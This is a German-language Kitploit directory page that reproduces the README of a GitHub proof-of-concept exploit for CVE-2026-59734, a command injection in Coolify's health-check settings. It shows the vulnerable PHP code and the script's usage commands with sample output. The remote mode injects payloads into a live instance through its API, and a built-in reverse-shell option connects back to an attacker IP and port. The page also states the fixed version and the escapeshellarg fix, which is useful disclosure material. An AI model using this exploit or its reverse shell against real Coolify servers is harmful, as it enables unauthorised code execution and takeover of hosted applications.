Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-59734-POC — OS-Befehlseinschleusung im Health Check → Remote Code Execution | Kitploit
Tools/GitHubGitHub/cybertechajju/cve-2026-59734-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlLernen & BildungPayload-Entwicklung
GitHubcybertechajju/cve-2026-59734-poc

CVE-2026-59734-POC

OS-Befehlseinschleusung im Health Check → Remote Code Execution

Repository anzeigen
13vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Hacker-Glitch

🚨 CVE-2026-59734 — Coolify RCE Exploit

OS Command Injection im Health Check → Remote Code Execution

CVE CVSS Advisory Patched Author


Medium Writeup YouTube



Proof-of-Concept-Exploit für OS Command Injection in der Health-Check-Konfiguration von Coolify.
Jeder authentifizierte Benutzer konnte beliebige Befehle in bereitgestellten Containern ausführen.


🎯 Über die Sicherheitslücke

Coolify ist eine beliebte Open-Source-, selbstgehostete Deployment-Plattform (30K+ GitHub-Sterne) – eine kostenlose Alternative zu Heroku, Vercel und Netlify.

Eine kritische OS Command Injection-Sicherheitslücke wurde in der Health-Check-Konfiguration von Coolify entdeckt. Die Parameter health_check_host, health_check_method und health_check_path werden direkt in Shell-Befehle interpoliert ohne jegliche Sanitisierung, sodass jeder authentifizierte Benutzer beliebige Befehle in Deployment-Containern ausführen kann.

┌──────────────────┬──────────────────────────────────────┐
│ CVE-ID           │ CVE-2026-59734                       │
│ Typ              │ OS Command Injection (CWE-78)        │
│ Schweregrad      │ HIGH — CVSS 8.8                      │
│ Angriffsvektor   │ Netzwerk (Authentifiziert)           │
│ Betroffen        │ Coolify <= v4.0.0-beta.460           │
│ Behoben in       │ Coolify >= v4.0.0-beta.469           │
│ Fix-Commit       │ 23f9156c7                            │
│ Melder           │ CyberTechAjju                        │
└──────────────────┴──────────────────────────────────────┘
🔥 Anfälliger Code (Zum Erweitern klicken)
// app/Jobs/ApplicationDeploymentJob.php — generate_healthcheck_commands()

// ⚠️ User input directly in shell command — NO escapeshellarg()!
$generated_healthchecks_commands = [
    "curl -s -X {$this->application->health_check_method} -f " .
    "{$this->application->health_check_scheme}://" .
    "{$this->application->health_check_host}:" .
    "{$health_check_port}" .
    "{$this->application->health_check_path} > /dev/null || exit 1",
];

🛠️ Was dieses Tool macht

Dieses PoC-Skript validiert und exploitiert CVE-2026-59734 mit zwei Modi:

ModusBeschreibungRisiko
--localSimuliert das anfällige Code-Muster offline. Keine Netzwerkanfragen. Testet alle 3 injizierbaren Parameter + überprüft den Fix.✅ Sicher
--remoteExploitiert eine echte Coolify-Instanz über die API. Injiziert Payload in die Health-Check-Konfiguration und löst ein Deployment aus.⚠️ Authentifizierung erforderlich

Funktionen

  • 🧪 4 Lokale Tests — Überprüft Injection über host, method, path + bestätigt, dass der Fix mit escapeshellarg() funktioniert
  • 🔑 Auth-Validierung — Überprüft API-Token und Berechtigungen vor dem Exploit-Versuch
  • 📋 Versionserkennung — Erkennt die Coolify-Version und warnt, falls bereits gepatcht
  • 🎯 Proof-Tokens — Verwendet eindeutige Tokens, um Fehlalarme zu vermeiden
  • 🐚 Reverse-Shell-Modus — Integrierter Reverse-Shell-Payload mit --lhost / --lport
  • 🧹 Bereinigungsmodus — Stellt die ursprüngliche Health-Check-Konfiguration nach dem Exploit wieder her
  • 🛡️ Injection-Verifizierung — Bestätigt, dass der Server den Payload unbereinigt gespeichert hat

⚡ Schnellstart

Lokale Validierung (Sicher & Offline)

git clone https://github.com/cybertechajju/CVE-2026-59734.git
cd CVE-2026-59734
chmod +x coolify_healthcheck_rce_poc.sh

# Run safe local validation
./coolify_healthcheck_rce_poc.sh --local

Erwartete Ausgabe:

═══ LOKALE VERWUNDBARKEITSMUSTER-VALIDIERUNG ═══

┌─ Test 1: health_check_host-Injection
│  ✅ VERWUNDBAR — Injizierter Befehl erfolgreich ausgeführt

┌─ Test 2: health_check_method-Injection
│  ✅ VERWUNDBAR — Method-Parameter ebenfalls injizierbar

┌─ Test 3: health_check_path-Injection
│  ✅ VERWUNDBAR — Path-Parameter ebenfalls injizierbar

┌─ Test 4: Prüft, ob escapeshellarg() das Problem behebt
│  ✅ SICHER — Bereinigte Eingabe verhindert Injection

Remote-Exploit (Nur für autorisierte Tests)

# Basic PoC — writes proof file inside the container
./coolify_healthcheck_rce_poc.sh --remote \
  --url https://your-coolify-instance:3000 \
  --token YOUR_API_TOKEN \
  --uuid YOUR_APP_UUID

# Reverse shell
./coolify_healthcheck_rce_poc.sh --remote \
  --url https://your-coolify-instance:3000 \
  --token YOUR_API_TOKEN \
  --uuid YOUR_APP_UUID \
  --lhost YOUR_IP \
  --lport 4444

# With auto-cleanup (restores original config after exploit)
./coolify_healthcheck_rce_poc.sh --remote \
  --url https://your-coolify-instance:3000 \
  --token YOUR_API_TOKEN \
  --uuid YOUR_APP_UUID \
  --cleanup

📋 Alle Optionen

Verwendung:

  Lokale Validierung (sicher, offline):
    ./coolify_healthcheck_rce_poc.sh --local

  Remote-Exploit (erfordert Authentifizierung):
    ./coolify_healthcheck_rce_poc.sh --remote --url <URL> --token <TOKEN> --uuid <UUID> [OPTIONEN]

Optionen:
  --url       Coolify-Instanz-URL (z.B. https://coolify.example.com)
  --token     API-Bearer-Token
  --uuid      Ziel-Anwendungs-UUID
  --payload   Benutzerdefinierter Injection-Payload
  --lhost     Angreifer-IP für Reverse-Shell
  --lport     Angreifer-Port für Reverse-Shell (Standard: 4444)
  --cleanup   Original-Konfiguration nach Exploit wiederherstellen

🔍 So erhalten Sie API-Token und App-UUID

API-Token:

  1. Melden Sie sich im Coolify-Dashboard an
  2. Gehen Sie zu Einstellungen → API-Token
  3. Generieren Sie ein neues Token

App-UUID:

curl -s https://YOUR-COOLIFY/api/v1/applications \
  -H "Authorization: Bearer YOUR_TOKEN" | jq '.[].uuid'

📖 Ausführlicher Bericht

Ich habe einen detaillierten Blogbeitrag geschrieben, der die gesamte Entdeckung, Ausnutzung und die daraus gewonnenen Erkenntnisse erklärt:

🔗 How I Found an OS Command Injection (RCE) in Coolify — Medium


🎥 Video-Durchgang

Sehen Sie sich die vollständige Exploit-Demo auf YouTube an:

🔗 CVE-2026-59734 — Coolify RCE Demo — YouTube


✅ Zeitleiste

Tool herunterladen